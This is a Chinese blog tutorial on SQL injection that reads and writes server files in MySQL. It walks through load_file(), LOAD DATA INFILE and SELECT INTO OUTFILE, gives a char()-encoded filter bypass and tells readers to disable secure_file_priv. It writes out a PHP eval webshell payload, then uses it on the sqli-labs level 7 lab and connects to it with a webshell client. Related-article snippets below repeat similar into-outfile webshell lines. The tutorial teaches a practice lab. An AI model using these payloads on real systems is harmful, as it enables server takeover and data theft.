SQL注入之文件导入导出

最新推荐文章于 2024-04-13 23:49:53 发布
最新推荐文章于 2024-04-13 23:49:53 发布
阅读量1.8k 收藏 4
点赞数
文章标签: 渗透测试 sql注入 数据库 MySQL sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35544379/article/details/77833262
版权

一、前言

继续深入学习SQL注入

二、背景

通过SQL注入,我们不仅可以获取数据库内容,还可以通过具有一定权限的数据库用户,对操作系统进行操作,本文讲的就是文件系统进行的操作。

三、前置知识

本部分参考lcamry先生的《SQL注入天书》的background 3

相关操作函数

1.load_file()导出文件

Load_file(file_name):读取文件并返回该文件的内容作为一个字符串

使用条件:

A.必须有权限读取并文件必须完全可读

B.欲读取文件必须在服务器上

C.必须指定文件完整的路径

D.欲读取文件必须小于max_allowed_packet

如果上述任一条件不能满足则文件不能被读出,函数返回空。其实这里最难满足的是条件要求


在实际的注入中,这里有两个难点需要解决

a.绝对物理路径

b.构造有效的畸形语句(报错爆出绝对路径)

在很多PHP程序中,当提交一个错误的Query,如果display_errors==on ,程序就会暴露WEB目录的绝对路径,只要知道路径,那么对于一个可以注入的PHP程序来说,整个服务器的安全将受到严重的威胁

示例

select 1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92,114,101,112,97,105,114,92,115,97,109)))

这里的char()函数可绕过某些黑名单的过滤

利用hex()将文件内容导出来,读取二进制文件,尤其是smb文件时可以使用

2.文件导入到数据库

利用LOAD DATA INFILE  和   LOAD_FILE 命令,将文本文件读到数据库中

首先我们需要创建一个简单的文本文件,用于存储导入数据库的表格信息

接着在Mysql控制台运行下列命令,创建一张表用于保存上述信息


接下来便可以开始我们的导入工作了

load data infile '文件路径" into table authors fields terminated by ' ';

OK导入成功,接下来看看效果


在执行操作的时候容易碰到没有权限的问题

我们可以找到mysql目录下的bin,打开my.ini,找到包含secure_file_priv的项,对其包含的路径做一个注释即可


3.导入内容到文件

我们还可以任意内容(数据库操作也可)到文件中去,这里需要文件权限。

语法为

select ……… into outfile 'file_name'   [file_name]不能已存在的文件

a.直接导入内容

select version() into outfile 'c:\\xxx\\xxx\\xxx\\xxx.txt'

select <?php @eval($_POST[\'zzz\']);?> into outfile '文件路径'

b.插入内容到文件结尾

Select version() Into outfile “c:\\phpnow\\htdocs\\test.php” LINES TERMINATED BY 0x16进制文件
解释:通常是用‘\r\n’结尾,此处我们修改为自己想要的任何文件。同时可以用FIELDS TERMINATED BY


当前台无法导出数据时,可使用下列语句

select load_file(‘c:\\wamp\\bin\\mysql\\mysql5.6.17\\my.ini’)into outfile ‘c:\\wamp\\www\\test.php’

四、实战演练

采用sqli-labs level7(dump into outfile)进行实验


0x01 测试注入点

发现是'))格式

0x02 测试字段数

结果为三

0x03 使用 into outfile 进行一句话的创建

结果显示出错,我们检查一下文件是否创建成功

0x04 检查文件创建结果

OK,文件已创建

0x05 菜刀连webshell

连接成功,为所欲为吧


Pz_mstr
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-lab教程——Less-7 GET - Dump into outfile - String (导出文件GET字符型注入
luosaierdadi的博客
07-08 314
几次尝试,不难猜出注释符被过滤了,但是看看题目:less 7 GET - Dump into outfile - String (导出文件GET字符型注入)所以大概要使用文件导出。我投机取巧了,找了个简单题less-2直接注入拿到路径,方便导出。这里插个小扩展:winserver的iis默认路径c:\Inetpub\wwwrootlinux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等ap
超级SQL注入工具使用说明书V201512271
08-08
- **导出配置**:将当前配置保存为XML文件,便于后期导入使用。 4. **注入中心**: - **数据包配置**:用户可以手动输入URL或使用抓包工具填充数据包。 - **注入设置**:根据需要调整注入策略,如开启URL编码等...
SQL注入漏洞攻击、数据库导入导出[从txt中导入导出]
zhanglan478950的专栏
11-27 1321
1.SQL注入漏洞攻击 protected void Button1_Click(object sender, EventArgs e) { string constr = "data source=pc-20120907sdqu;initial catalog=shool;user id=sa;password=admin"; usi
SQL注入文件读写+魔术引号,写给程序员的Flutter详细教程
最新发布
2401_83947048的博客
04-13 824
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
MySQL-SQL注入导入导出
MinggeQingchun的博客
01-22 562
一、MySQLSQL 注入 SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令 以下实例中,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到 20 个字符之间 if (preg_match("/^\w{8,20}$/", $_GET['username'], $matches)){ $result = mysqli_query($conn, "SELECT * FROM users
Mysql注入 -- 数据库导出及读文件
weixin_41489908的博客
05-11 931
社会运行的规则和自己的不一样,不能我行我素,甚至有时还得违心讨好。。。 ---- 网易云热评 一、数据库导出文件 1、连接数据库 2、通过intooutfile导出数据库内容 select * from users into outfile "c:/1.sql"; 3、通过intooutfile语句,在C盘目录写入一句话木马 select '<?php phpinfo();?>' into outfile "c:/aiyou.php"; 4、通过实例导出一...
SQL注入
bossDDYY的博客
09-20 1374
sql注入
SQL Server数据库重命名、数据导出的方法说明
01-19
代码如下:create proc killspid (@dbname varchar(20)) as begin declare @sql nvarchar(500),@temp varchar(1000) declare @spid int set @sql=’declare getspid cursor for select 
向数据库中以Excel形式导入导出
12-23
需要注意的是,这种直接将字符串拼接成SQL语句的方法存在SQL注入的风险,实际开发中应使用参数化查询或存储过程来提高安全性。此外,为了提高性能,可以考虑使用SqlBulkCopy类进行大量数据的批量导入。 在完成数据...
C#操作Excel(导入导出
08-31
在C#编程中,处理Excel文件通常是为了数据导入导出的需求。在给定的代码示例中,展示了如何使用C#操作Excel进行数据的读取和写入,主要依赖于.NET Framework中的`OleDb`组件,通过Jet OLEDB提供程序与Excel文件...
excel 导入sql
05-11
- 安全性:如果使用SQL语句直接导入,要确保数据源的可靠性,避免SQL注入等安全问题。 - 日志记录:在进行数据导入时,记录日志以便于追踪和排查问题。 综上所述,将Excel数据导入MySQL可以采用多种策略,具体选择...
sql注入之——读写文件,带外攻击
wsnbbz的博客
02-10 1546
1.开启读文件权限 在my.ini加上secure_file_priv= secure_file_priv=代表对文件读写没有限制 secure_file_priv=NULL代表不能进行文件读写 secure_file_priv=d:/…代表只能对改路径下文件进行读写 2.读文件: 函数: load_file(); 语句: ?id=-1 union select 1,load_file(“d:\...
sqli-labs:7,导入导出;8-10 延时注入
weixin_30532973的博客
03-24 152
1,Load_file()导出文件 使用条件:   A.必须有权限读取并且文件必须完全可读(and (select count(*) from mysql.user)>0/* 如果结果返回正常,说明具有读写权限。)   B.欲读取文件必须在服务器上   C.必须指定文件完整的路径(常用路径)   D.欲读取文件必须小于 max_allowed_packet 2,LOAD DATA...
[导入]防止SQL注入式攻击
weixin_30929011的博客
03-24 68
文章来源:http://blog.csdn.net/21aspnet/archive/2007/03/23/1539296.aspx 转载于:https://www.cnblogs.com/zhaoxiaoyang2/archive/2007/03/24/816377.html
SQL注入文件写入和读取详解
weixin_30246221的博客
01-15 1353
文件读取使用load_file()函数: 使用之前我们需要先找到网站的绝对路径。(获取办法:报错显示、谷歌语法、site:目标网站 warning、遗留文件如phpinfo、漏洞爆出路径、读取配置文件) 注意路径符号:错误“\” 正确"\\" 正确"/"。如果将路径转换为16进制就可以不用引号。 举例: union select 1,load_file(“c:/inetpub/wwwr...
SQL注入文件读写
永远是少年
06-27 2191
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入文件读写。 一、SQL注入文件读写函数 二、SQL注入文件读写之secure_file_priv参数 三、SQL注入文件路径获取 四、SQL注入文件读写之魔术引导开关......
sql 注入读写文件
yuan_boss的博客
08-24 485
获取到用户为root,主机为localhost,然后将这两个信息作为条件,接下来查看是否有文件读写权限。与当前mysql用户具有File_priv权限之外,还要确保当前系统用户具有访问hosts文件的权限。根据结果可知,当前mysql用户为root,主机为名为localhost。要想复现sql注入的读写,首先mysql就需要满足下面的条件。想要读取某个文件,除了需要需要关闭mysql中的安全选项。本次实战,以sqli_labs靶场的第1关为例。发现读取成功,看到了hosts文件的内容。通过联合注入的方式,
sql注入之into outfile
ljj20020718的博客
11-25 2390
sql注入之into outfile
SQL注入——into outfile的使用
weixin_54217950的博客
02-16 4573
在数据库中into outfile语句把表数据导出到一个文本文件中,那么利用这个语句,再配合满足的‘三个条件’,即可实现文件或者一句话木马导入到数据库文件的目录中。 三个条件: 1.具有root权限。 2.在数据库配置文件中的 配置项含有:secure_file_priv=''。(注意在数据库中此项默认为secure_file_priv=null)。 3.知道数据库的绝对路径。 注意:由于满足条件十分苛刻,所以很难实现。 例子 导入文件命令:http://127.0.0.1/sqli-labs-maste
SQLite文件数据库、内存数据库使用C++建立及导入导出
05-24
以下是使用C++建立SQLite文件数据库、内存数据库以及导入导出数据的示例代码: 1. 建立SQLite文件数据库 ```c++ #include #include int main() { sqlite3 *db; int rc = sqlite3_open("test.db", &db); // ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值